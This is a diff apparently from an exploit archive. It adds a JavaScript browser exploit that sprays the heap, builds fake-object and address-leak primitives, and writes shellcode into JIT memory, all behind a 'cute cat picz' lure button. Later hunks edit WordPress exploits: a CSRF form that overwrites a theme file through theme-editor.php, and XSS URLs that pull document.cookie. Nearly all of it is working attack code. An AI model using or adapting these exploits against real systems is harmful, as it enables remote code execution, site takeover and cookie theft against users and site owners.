+    // hax is surrounded by other Uint8Array instances. Thus *(&hax - 8) == 0x100,
+    // which is the butterfly length if hax is later used as a butterfly for a
+    // fake JSArray.
+    var hax = haxs[0x80];
+    var hax2 = haxs[0x81];
+
+    var target_func = make_compiled_function();
+
+    // Small helper to avoid allocations with .set(), so we don't mess up the heap
+    function set(p, i, a,b,c,d,e,f,g,h) {
+        p[i+0]=a; p[i+1]=b; p[i+2]=c; p[i+3]=d; p[i+4]=e; p[i+5]=f; p[i+6]=g; p[i+7]=h;
+    }
+
+    function spray() {
+        var res = new Uint8Array(0x7ffff000);
+        for (var i = 0; i < 0x7ffff000; i += 0x1000) {
+            // Write heap pattern.
+            // We only need a structure pointer every 128 bytes, but also some of
+            // structure fields need to be != 0 and I can't remember which, so we just
+            // write pointers everywhere.
+            for (var j = 0; j < 0x1000; j += 8)
+                set(res, i + j, 0x08, 0, 0, 0x50, 0x01, 0, 0, 0);
+
+            // Write the offset to the beginning of each page so we know later
+            // with which part we overlap.
+            var j = i+1+2*8;
+            set(res, j, j&0xff, (j>>8)&0xff, (j>>16)&0xff, (j>>24)&0xff, 0, 0, 0xff, 0xff);
+        }
+        return res;
+    }
+
+    // Spray ~14 GiB worth of array buffers with our pattern.
+    var x = [
+        spray(), spray(), spray(), spray(),
+        spray(), spray(), spray(), spray(),
+    ];
+
+    // The butterfly of our fake object will point to 0x200000001. This will always
+    // be inside the second sprayed buffer.
+    var buf = x[1];
+
+    // A big array to hold reference to objects we don't want to be freed.
+    var ary = new Array(0x10000000);
+    var cnt = 0;
+
+    // Set up objects we need to trigger the bug.
+    var n = 0x40000;
+    var m = 10;
+    var regex = new RegExp("(ab)".repeat(n), "g");
+    var part = "ab".repeat(n);
+    var s = (part + "|").repeat(m);
+
+    // Set up some views to convert pointers to doubles
+    var convert = new ArrayBuffer(0x20);
+    var cu = new Uint8Array(convert);
+    var cf = new Float64Array(convert);
+
+    // Construct fake JSCell header
+    set(cu, 0,
+        0,0,0,0,  // structure ID
+        8,        // indexing type
+        0,0,0);   // some more stuff we don't care about
+
+    var container = {
+        // Inline object with indebufng type 8 and butterly pointing to hax.
+        // Later we will refer to it as fakearray.
+        jsCellHeader: cf[0],
+        butterfly: hax,
+    };
+
+    while (1) {
+        // Try to trigger bug
+        s.replace(regex, function() {
+            for (var i = 1; i < arguments.length-2; ++i) {
+                if (typeof arguments[i] === 'string') {
+                    // Root all the callback arguments to force GC at some point
+                    ary[cnt++] = arguments[i];
+                    continue;
+                }
+                var a = arguments[i];
+
+                // a.butterfly points to 0x200000001, which is always
+                // inside buf, but we are not sure what the exact
+                // offset is within it so we read a marker value.
+                var offset = a[2];
+
+                // Compute addrof(container) + 16. We write to the fake array, then
+                // read from a sprayed array buffer on the heap.
+                a[2] = container;
+                var addr = 0;
+                for (var j = 7; j >= 0; --j)
+                    addr = addr*0x100 + buf[offset + j];
+
+                // Add 16 to get address of inline object
+                addr += 16;
+
+                // Do the inverse to get fakeobj(addr)
+                for (var j = 0; j < 8; ++j) {
+                    buf[offset + j] = addr & 0xff;
+                    addr /= 0x100;
+                }
+                var fakearray = a[2];
+
+                // Re-write the vector pointer of hax to point to hax2.
+                fakearray[2] = hax2;
+
+                // At this point hax.vector points to hax2, so we can write
+                // the vector pointer of hax2 by writing to hax[16+{0..7}]
+
+                // Leak address of JSFunction
+                a[2] = target_func;
+                addr = 0;
+                for (var j = 7; j >= 0; --j)
+                    addr = addr*0x100 + buf[offset + j];
+
+                // Follow a bunch of pointers to RWX location containing the
+                // function's compiled code
+                addr += 3*8;
+                for (var j = 0; j < 8; ++j) {
+                    hax[16+j] = addr & 0xff;
+                    addr /= 0x100;
+                }
+                addr = 0;
+                for (var j = 7; j >= 0; --j)
+                    addr = addr*0x100 + hax2[j];
+
+                addr += 3*8;
+                for (var j = 0; j < 8; ++j) {
+                    hax[16+j] = addr & 0xff;
+                    addr /= 0x100;
+                }
+                addr = 0;
+                for (var j = 7; j >= 0; --j)
+                    addr = addr*0x100 + hax2[j];
+
+                addr += 4*8;
+                for (var j = 0; j < 8; ++j) {
+                    hax[16+j] = addr & 0xff;
+                    addr /= 0x100;
+                }
+                addr = 0;
+                for (var j = 7; j >= 0; --j)
+                    addr = addr*0x100 + hax2[j];
+
+                // Write shellcode
+                for (var j = 0; j < 8; ++j) {
+                    hax[16+j] = addr & 0xff;
+                    addr /= 0x100;
+                }
+                hax2[0] = 0xcc;
+                hax2[1] = 0xcc;
+                hax2[2] = 0xcc;
+
+                // Pwn.
+                target_func();
+            }
+            return "x";
+        });
+    }
+}
+</script>
+
+<button onclick="pwn()">click here for cute cat picz!</button>
--- a/platforms/php/webapps/29754.html
+++ b/platforms/php/webapps/29754.html
@ -14,7 +14,7 @@ An attacker may leverage this issue to execute arbitrary script code in the brow

 	<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
 		<p>
-			<textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?>&lt;/textarea&gt;
+			<textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea>
 		</p>
 		<p>
 			<input type="hidden" name="action" value="update" />
--- a/platforms/php/webapps/32053.txt
+++ b/platforms/php/webapps/32053.txt
@ -6,5 +6,5 @@ An attacker may leverage these issues to execute arbitrary script code in the br

 Versions prior to WordPress 2.6 are vulnerable. 

-http://www.example.com/wp/wp-admin/press-this.php/?ajax=video&amp;s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
-http://www.example.com/wp/wp-admin/press-this.php/?ajax=thickbox&amp;i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/wp/wp-admin/press-this.php/?ajax=video&s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+http://www.example.com/wp/wp-admin/press-this.php/?ajax=thickbox&i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E